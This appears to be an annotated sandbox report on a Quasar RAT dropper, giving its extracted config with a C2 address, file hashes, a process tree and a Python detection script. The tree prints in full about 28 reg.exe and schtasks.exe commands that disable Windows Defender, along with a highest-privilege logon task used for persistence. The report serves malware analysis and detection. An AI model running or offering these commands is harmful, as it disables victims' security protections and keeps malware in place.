Analysis

max time kernel: 23s
max time network: 29s
platform: windows7_x64
resource: win7-en-20211104
submitted: 06-12-2021 06:33

Static task: static1
Behavioral task: behavioral1
Sample: 05603775ae6c66c7207556660da29de4.exe
Resource: win7-en-20211104

General

Target: 05603775ae6c66c7207556660da29de4.exe
Size: 13.8MB
MD5: 05603775ae6c66c7207556660da29de4
SHA1: 96f1bed1e99e6cd51c4973a8b586f08097009c15
SHA256: 09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369
SHA512: 7aa7620eda7d2a369414abb6d94671a3b8f039d4fce6dabedcc1daba1c0f91468555512dc7827e050b61168a77a4c2f8636eb8ba4a26b399c22a88709d8c5326
Malware Config

Extracted: quasar
version: 2.8.0.1
Driver   (unlabelled in the extracted config; the same string appears as log_directory below)
134.255.220.204:4782   (unlabelled host:port entry; 4782 is the default Quasar listener port)
6IzunZymIRucbMwSQj   (unlabelled in the extracted config)
encryption_key: 85wBI2y5JEbQcrqb3u8l
install_name: Driver.exe
log_directory: Driver
reconnect_delay: 1000
startup_key: Realtek® High Definition Audio Driver
subdirectory: Realtek® High Definition Audio Driver
Signatures

Quasar Payload (4 IoCs)
  YARA rule family_quasar matched four times on \Users\Admin\AppData\Roaming\rat v6.exe (three of the four hits record the path with the drive letter, C:\Users\Admin\AppData\Roaming\rat v6.exe).

NirSoft WebBrowserPassView (1 IoC)
  Password recovery tool for various web browsers.
  YARA rule WebBrowserPassView matched behavioral1/memory/544-96-0x000000001B510000-0x000000001B84B000-memory.dmp. PID 544 is RtkBtManServ.exe, the binary that keylogger py best.exe launches with a base64 argument (see the process tree).

Nirsoft (1 IoC)
  YARA rule Nirsoft matched the same dump, behavioral1/memory/544-96-0x000000001B510000-0x000000001B84B000-memory.dmp.

Executes dropped EXE (5 IoCs)
  PID 1636  keylogger py best.exe
  PID 1500  rat v6.exe
  PID 1488  loader.exe
  PID 544   RtkBtManServ.exe
  PID 1888  rat v6.exe

Loads dropped DLL (4 IoCs)
  PID 776   05603775ae6c66c7207556660da29de4.exe (three loads)
  PID 1636  keylogger py best.exe

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 4: ip-api.com

Drops file in System32 directory (4 IoCs)
  File created                  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   by rat v6.exe
  File opened for modification  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   by rat v6.exe
  File opened for modification  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe   by Driver.exe
  File opened for modification  C:\Windows\SysWOW64\Realtek® High Definition Audio Driver              by Driver.exe
  The target directory and file name match the subdirectory and install_name fields of the extracted Quasar config.

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  PID 1488  loader.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's canned description calls this "likely ransomware behaviour", but nothing else in this run (no mass file modification, no ransom note) supports that reading; treat it as a generic heuristic.

Creates scheduled task(s) (1 TTP, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1956  schtasks.exe
  PID 1508  schtasks.exe
  PID 1920  schtasks.exe
  All three create the same ONLOGON task "Realtek® High Definition Audio Driver" with /rl HIGHEST (see the process tree).

Runs ping.exe (1 TTP, 1 IoC)
  PING.EXE PID 844, spawned from the batch file rat v6.exe runs; the ping serves as a delay before the relaunch.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 1488  loader.exe   (7 events)
  PID 1316  Driver.exe   (the remaining 57 events)

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege  PID 1500  rat v6.exe
  Token: SeDebugPrivilege  PID 544   RtkBtManServ.exe
  Token: SeDebugPrivilege  PID 1316  Driver.exe (twice)

Suspicious use of WriteProcessMemory (60 IoCs)
  Every parent-to-child pair below is recorded four times in the report (four writes per process creation); the repeats are collapsed here, 15 pairs x 4 = 60.
  PID 776   05603775ae6c66c7207556660da29de4.exe  ->  PID 1636  keylogger py best.exe
  PID 776   05603775ae6c66c7207556660da29de4.exe  ->  PID 1500  rat v6.exe
  PID 776   05603775ae6c66c7207556660da29de4.exe  ->  PID 1488  loader.exe
  PID 1636  keylogger py best.exe                  ->  PID 544   RtkBtManServ.exe
  PID 1500  rat v6.exe                             ->  PID 1956  schtasks.exe
  PID 1500  rat v6.exe                             ->  PID 1720  cmd.exe
  PID 1720  cmd.exe                                ->  PID 1692  chcp.com
  PID 1720  cmd.exe                                ->  PID 844   PING.EXE
  PID 1720  cmd.exe                                ->  PID 1888  rat v6.exe
  PID 1316  Driver.exe                             ->  PID 1920  schtasks.exe
  PID 1316  Driver.exe                             ->  PID 984   explorer.exe
  PID 1316  Driver.exe                             ->  PID 1796  WScript.exe
  PID 1316  Driver.exe                             ->  PID 1360  WScript.exe
  PID 1316  Driver.exe                             ->  PID 1948  conhost.exe
  PID 1316  Driver.exe                             ->  PID 1572  conhost.exe
  The list is capped at 60 entries, so some creations visible in the process tree (rat v6.exe PID 1888 starting schtasks.exe PID 1508 and Driver.exe PID 1316, and Driver.exe starting its PowerShell children) do not appear here.
Processes

Indentation follows the parent/child depth the report records. Where the recorded image path differs from the path given in the command line, the image is shown in brackets: the whole chain under the 32-bit rat v6.exe / Driver.exe is resolved to C:\Windows\SysWOW64\ by WOW64 file-system redirection even where the command line names System32.

Chain in brief: the sample drops and runs keylogger py best.exe, rat v6.exe and loader.exe. rat v6.exe (PID 1500) creates the logon task, then runs a batch file that sets the console code page, pings as a delay and relaunches rat v6.exe (PID 1888); that copy creates the task again and starts the installed copy, Driver.exe (PID 1316), from the SysWOW64 subdirectory named in the config. Driver.exe creates the task a third time, launches three VBS files and 28 PowerShell children that invoke reg.exe and schtasks.exe to switch off Windows Defender. Note the sandbox is Windows 7: several of the targeted keys and tasks (Tamper Protection, ExploitGuard, SecurityHealth, the Defender maintenance tasks) only exist on Windows 10, so those commands document intent but have no effect on this image.

"C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"
    Loads dropped DLL; Suspicious use of WriteProcessMemory
  "C:\Users\Admin\AppData\Roaming\keylogger py best.exe"
      Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4gbUNbdjDVoEzuwe9QI1beMhUDwpgbq9t8eYqac7ixuzdX2esxhonYoBWN9FbGupbkub/9oCF5YryYcksMtSymyriBd/PbXKARudWjYmyujJNq14nt3KQdYmw2VrgARL8=
        Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
  "C:\Users\Admin\AppData\Roaming\rat v6.exe"
      Executes dropped EXE; Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    "schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f   [C:\Windows\SysWOW64\schtasks.exe]
        Creates scheduled task(s)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\メム尺ムフ丂刀ノ乃ムリリキノレひ.bat" "   [C:\Windows\SysWOW64\cmd.exe]
        Suspicious use of WriteProcessMemory
      chcp 65001   [C:\Windows\SysWOW64\chcp.com]
      ping -\Common 10 localhost   [C:\Windows\SysWOW64\PING.EXE]   (arguments as recorded)
          Runs ping.exe
      "C:\Users\Admin\AppData\Roaming\rat v6.exe"
          Executes dropped EXE
        "schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f   [C:\Windows\SysWOW64\schtasks.exe]
            Creates scheduled task(s)
        "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"
            Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          "schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f   [C:\Windows\SysWOW64\schtasks.exe]
              Creates scheduled task(s)
          "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs   [C:\Windows\SysWOW64\explorer.exe]
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"   [C:\Windows\SysWOW64\WScript.exe]
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"   [C:\Windows\SysWOW64\WScript.exe]
          28 children of the form "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <arguments>   [C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe]. None runs a cmdlet; each hands a reg.exe or schtasks.exe command line to PowerShell. Arguments, in the order recorded:
            reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f   (the "/ t" is as recorded; a bare "/" is not a valid reg.exe switch, so this one fails with a syntax error)
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
            reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\ムレり尺キリリりリ√りゐノア尺ᄃ.bat" "   [C:\Windows\SysWOW64\cmd.exe]
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ᄃノ乃ズフイ√んノ乇ム√乙刀ᄃᄃ.bat" "   [C:\Windows\SysWOW64\cmd.exe]
          chcp 65001   [C:\Windows\SysWOW64\chcp.com]
  "C:\Users\Admin\AppData\Roaming\loader.exe"
      Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  (a COM-activated 64-bit explorer; consistent with the 32-bit Driver.exe above passing Execution.vbs to explorer.exe, which the shell then opened with the .vbs file handler)

\??\C:\Windows\system32\conhost.exe "1328126241991120274-1561569992253893810-1445296795-2367036713013149801217809446"

\??\C:\Windows\system32\conhost.exe "-1400704528-11540688901002455783666105746-521151200-2967132471009405368-11829814"
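The Signatures list and the process tree above reduce to a few patterns that are detectable from process-creation telemetry alone: a burst of reg.exe / schtasks.exe commands against Windows Defender keys and tasks launched through PowerShell, a logon task with /rl HIGHEST whose action sits in a vendor-named subdirectory of SysWOW64, and a cmd.exe that uses ping as a sleep and then re-runs its own parent's image. The Python below is an added example, not part of the sandbox report: it encodes those three patterns as rules and runs them over Sysmon-style (pid, ppid, image, command line) events built from the command lines recorded above. The PIDs 4001-4009 and the two benign control events at the end are made up (the report gives no PIDs for the PowerShell children); everything else is the report's.

```python
"""Rules for the behaviours this report records; added example, not the report's own."""
import re
from collections import defaultdict

ROAM = r"C:\Users\Admin\AppData\Roaming"
SYS = r"C:\Windows\SysWOW64"
PSIMG = SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
DRV = SYS + r"\Realtek® High Definition Audio Driver\Driver.exe"

# (pid, ppid, image, command line), Sysmon event 1 style. Command lines are copied from
# the report; PIDs 4001-4009 and the two benign controls at the end are constructed.
EVENTS = [
    (1500, 776, ROAM + r"\rat v6.exe", '"' + ROAM + r'\rat v6.exe"'),
    (1956, 1500, SYS + r"\schtasks.exe", r'"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "' + DRV + '" /rl HIGHEST /f'),
    (1720, 1500, SYS + r"\cmd.exe", r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\メム尺ムフ丂刀ノ乃ムリリキノレひ.bat" "'),
    (1692, 1720, SYS + r"\chcp.com", "chcp 65001"),
    (844, 1720, SYS + r"\PING.EXE", r"ping -\Common 10 localhost"),
    (1888, 1720, ROAM + r"\rat v6.exe", '"' + ROAM + r'\rat v6.exe"'),
    (1316, 1888, DRV, '"' + DRV + '"'),
    (4001, 1316, PSIMG, PS + r'reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f'),
    (4002, 1316, PSIMG, PS + r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'),
    (4003, 1316, PSIMG, PS + r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f'),
    (4004, 1316, PSIMG, PS + r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'),
    (4005, 1316, PSIMG, PS + r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    (4006, 1316, PSIMG, PS + r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f'),
    (4007, 1316, PSIMG, PS + r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f'),
    (4008, 400, r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "Backup" /sc DAILY /tr "C:\Program Files\Backup\backup.exe" /f'),
    (4009, 400, r"C:\Windows\System32\reg.exe", r'reg query "HKLM\Software\Policies\Microsoft\Windows Defender"'),
]

REG_VERB = re.compile(r"\breg\s+(add|delete)\b", re.I)
# Keyed on the registry path, not the switch syntax, so the report's malformed
# "/ t REG_DWORD" line (which reg.exe itself rejects) is still caught as an attempt.
DEFENDER_KEYS = [
    (re.compile(r"Windows Defender\\Features.*TamperProtection", re.I), "tamper-protection-key"),
    (re.compile(r"HKLM\\Software\\Policies\\Microsoft\\Windows Defender", re.I), "defender-policy-key"),
    (re.compile(r'Services\\(WdBoot|WdFilter)"\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"4"', re.I), "defender-driver-disabled"),
    (re.compile(r"Autologger\\Defender(Api|Audit)Logger", re.I), "defender-etw-logger"),
    (re.compile(r'\\Run"\s+/v\s+"SecurityHealth"', re.I), "securityhealth-autorun-removed"),
]
DEFENDER_TASK = re.compile(r'schtasks\s+/Change\s+/TN\s+"Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\[^"]+"\s+/Disable', re.I)
TASK_CREATE = re.compile(r'schtasks"?\s+/create\b.*?/tr\s+"([^"]+)"', re.I)


def classify_defender_tamper(cmd):
    """Label a command line that edits Defender state, or None."""
    if DEFENDER_TASK.search(cmd):
        return "defender-task-disabled"
    if REG_VERB.search(cmd):
        for pattern, label in DEFENDER_KEYS:
            if pattern.search(cmd):
                return label
    return None


def logon_task_reasons(cmd):
    """Why a schtasks /create looks like persistence; [] when nothing stands out."""
    m = TASK_CREATE.search(cmd)
    if not m:
        return []
    target, low = m.group(1), cmd.lower()
    checks = [
        ("runs-at-logon", "/sc onlogon" in low),
        ("highest-run-level", "/rl highest" in low),
        ("syswow64-subdirectory", re.search(r"\\syswow64\\[^\\]+\\", target, re.I) is not None),
        ("non-ascii-in-path", any(ord(c) > 127 for c in target)),  # the ® in the task path
    ]
    return [name for name, hit in checks if hit]


def _base(image):
    return image.rsplit("\\", 1)[-1].lower()


def ping_delay_relaunch(events):
    """cmd.exe that spawns ping (a sleep) and re-runs its parent's image; keyed on the
    ping image rather than its arguments, which the report shows mangled."""
    by_pid = {e[0]: e for e in events}
    kids = defaultdict(list)
    for e in events:
        kids[e[1]].append(e)
    hits = []
    for pid, ppid, image, _ in events:
        if _base(image) != "cmd.exe" or ppid not in by_pid:
            continue
        if "ping.exe" in [_base(c[2]) for c in kids[pid]]:
            parent = _base(by_pid[ppid][2])
            hits += [(pid, c[0], c[2]) for c in kids[pid] if _base(c[2]) == parent]
    return hits


def scan(events):
    """Run every rule; Defender edits are also rolled up per parent to catch the burst."""
    tamper, persistence, per_parent = [], [], defaultdict(set)
    for pid, ppid, _, cmd in events:
        label = classify_defender_tamper(cmd)
        if label:
            tamper.append((pid, label))
            per_parent[ppid].add(label)
        reasons = logon_task_reasons(cmd)
        if len(reasons) >= 2:
            persistence.append((pid, reasons))
    return {"tamper": tamper, "persistence": persistence, "relaunch": ping_delay_relaunch(events),
            "tamper_bursts": [p for p, s in per_parent.items() if len(s) >= 3]}
```

Run `scan(EVENTS)`: the seven PowerShell children are each labelled, PID 1316 (Driver.exe) is reported as a burst because it parented at least three distinct kinds of Defender edit, the task created by PID 1956 is flagged on all four counts while the constructed daily backup task is not, and cmd.exe 1720 is reported for re-running rat v6.exe after the ping. The policy-key rule fires on any reg add/delete under HKLM\Software\Policies\Microsoft\Windows Defender regardless of value: legitimate changes there arrive through Group Policy, not through reg.exe launched from a user-profile binary.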
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

Dropped files, one entry per distinct file. The report lists several of these two or three times (once with the drive letter, once as \Users\...); the repeats are collapsed here.

C:\Users\Admin\AppData\Local\Execution.vbs
  MD5     a76dc4fbd53fe8d087cb78ff16134a26
  SHA1    8f565d5b491f4f7b27e6af34bb7798f9b5bb558b
  SHA256  b15dbb3f1554b1e6b0a66423df0a205b157276e2e3d31d7a1c7dd480d615e1e6
  SHA512  69de3d0f22c921f07e0db2324d4dfcec717a1cdcb47b24f19a53d21f7876b9099ff1a7e44ae037c38e1cc864d53b8ecac45c8b376bd7e497dd745c4347307470

C:\Users\Admin\AppData\Local\Execution2.vbs
  MD5     cf1d37e3ccdde125c06f1383c88d9358
  SHA1    dcb51cbdab941e7cec28817ffae2fba1f27f1931
  SHA256  35873184c68848d8275eea24d4484870cad72972c34e4c553786fec6f4321d7a
  SHA512  dade8e3835b9f4b317ab2a7e4e52b4df619b4e1ccb3ede46d90a440b77da1f9ffb30804e5b889c866661122f16b6a44319b71ddaf277f4bb43acf24f076b3d0b

C:\Users\Admin\AppData\Local\Execution5.vbs
  MD5     05a460cc05b28e1fc6ee9aadd0e2e7b1
  SHA1    4ac79e93d6467e809acfbb2a5b0370537fb99460
  SHA256  2e841a3b2fcb2f3e5f87a25656a85cd6ea8bd9c04421ac636239fccc5f7cc7a9
  SHA512  471f54955d054cfe3b2f23a801e84f7261e70271c18bc9bba736cab948a6c4544b62b40f318d4a55df29e3e640f0529432fe7b69822238dbbcec222da86b13f7

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe   (listed three times in the report)
  MD5     88ab0bb59b0b20816a833ba91c1606d3
  SHA1    72c09b7789a4bac8fee41227d101daed8437edeb
  SHA256  f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
  SHA512  05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

C:\Users\Admin\AppData\Local\Temp\メム尺ムフ丂刀ノ乃ムリリキノレひ.bat
  MD5     915635b483fd0ad042568d6d85a185c0
  SHA1    0b6524eaad0ad392594b7dad1461fc6864838ce9
  SHA256  d1ff0e80092079bc0fbf70a0249cb9955f67d83ec402deea359c07c5f37f8890
  SHA512  d1bb91efe6cf70019fb3d7cec3723c9ca8fd036c2c5fbfdde46f7f7d8883775bba8a6b14f7c9ef4bee4771ed1b8992b1fa9aeb65b608476edbd8e7bb124955fe

C:\Users\Admin\AppData\Roaming\keylogger py best.exe   (listed three times in the report)
  MD5     a20d50809d850ea9621ec8056ca52ee9
  SHA1    47cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
  SHA256  ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
  SHA512  0f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f

C:\Users\Admin\AppData\Roaming\loader.exe   (listed three times in the report)
  MD5     cd8ab729965533ed53755d09ad10c790
  SHA1    d09623a311dad9eb598cd2ef234ea1d6bfaf318e
  SHA256  9e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
  SHA512  834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f

C:\Users\Admin\AppData\Roaming\rat v6.exe   (listed four times in the report; the file the family_quasar YARA rule matched)
  MD5     8a177113878be7de28f07a9f2b2bd56a
  SHA1    355d23771a07b4c6aaf86c6c28eb61f873b7e000
  SHA256  26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
  SHA512  1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b

The report gives no hashes for the installed copy C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe or for the two other .bat files named in the process tree.
-
Memory dumps (behavioral1)

Dumps with region contents, grouped by PID:

memory/544-88    0x00000000010C0000-0x00000000010C1000   4KB
memory/544-96    0x000000001B510000-0x000000001B84B000   3.2MB   (RtkBtManServ.exe; the WebBrowserPassView / Nirsoft YARA hit)
memory/544-97    0x00000000002C0000-0x00000000002C1000   4KB
memory/544-98    0x0000000000E70000-0x0000000000F1C000   688KB
memory/544-99    0x000000001B490000-0x000000001B492000   8KB
memory/776-55    0x0000000075BB1000-0x0000000075BB3000   8KB
memory/776-56    0x0000000002F70000-0x0000000002F71000   4KB
memory/984-108   0x000000006F001000-0x000000006F003000   8KB
memory/1316-100  0x0000000000A40000-0x0000000000A41000   4KB
memory/1316-103  0x0000000004E90000-0x0000000004E91000   4KB
memory/1392-120  0x000007FEFB751000-0x000007FEFB753000   8KB
memory/1488-76   0x0000000140000000-0x0000000141434000   20.2MB  (loader.exe; 0x140000000 is the default 64-bit PE image base)
memory/1488-80   0x0000000077080000-0x0000000077082000   8KB
memory/1488-81   0x0000000076ED0000-0x0000000077079000   1.7MB
memory/1488-82   0x0000000076CB0000-0x0000000076DCF000   1.1MB
memory/1500-66   0x0000000000B20000-0x0000000000B21000   4KB
memory/1500-73   0x00000000048D0000-0x00000000048D1000   4KB
memory/1636-65   0x0000000000D60000-0x0000000000D61000   4KB
memory/1636-74   0x0000000004AB0000-0x0000000004AB1000   4KB

Mapping-only entries (memory/<pid>-<index>-0x0000000000000000-mapping.dmp, no region contents), listed as pid-index:
544-84, 592-116, 828-137, 844-93, 920-131, 984-105, 1044-122, 1100-118, 1112-127, 1112-136, 1152-129, 1360-110, 1384-125, 1488-70, 1500-62, 1572-115, 1636-58, 1640-117, 1652-124, 1660-138, 1692-92, 1716-132, 1720-90, 1780-134, 1780-139, 1796-107, 1888-94, 1920-104, 1948-114, 1956-87, 2008-126, 2020-119, 2044-121, 2072-141, 2092-142, 2116-143, 2160-144, 2200-145, 2236-146, 2252-147, 2304-148, 2348-149, 2360-150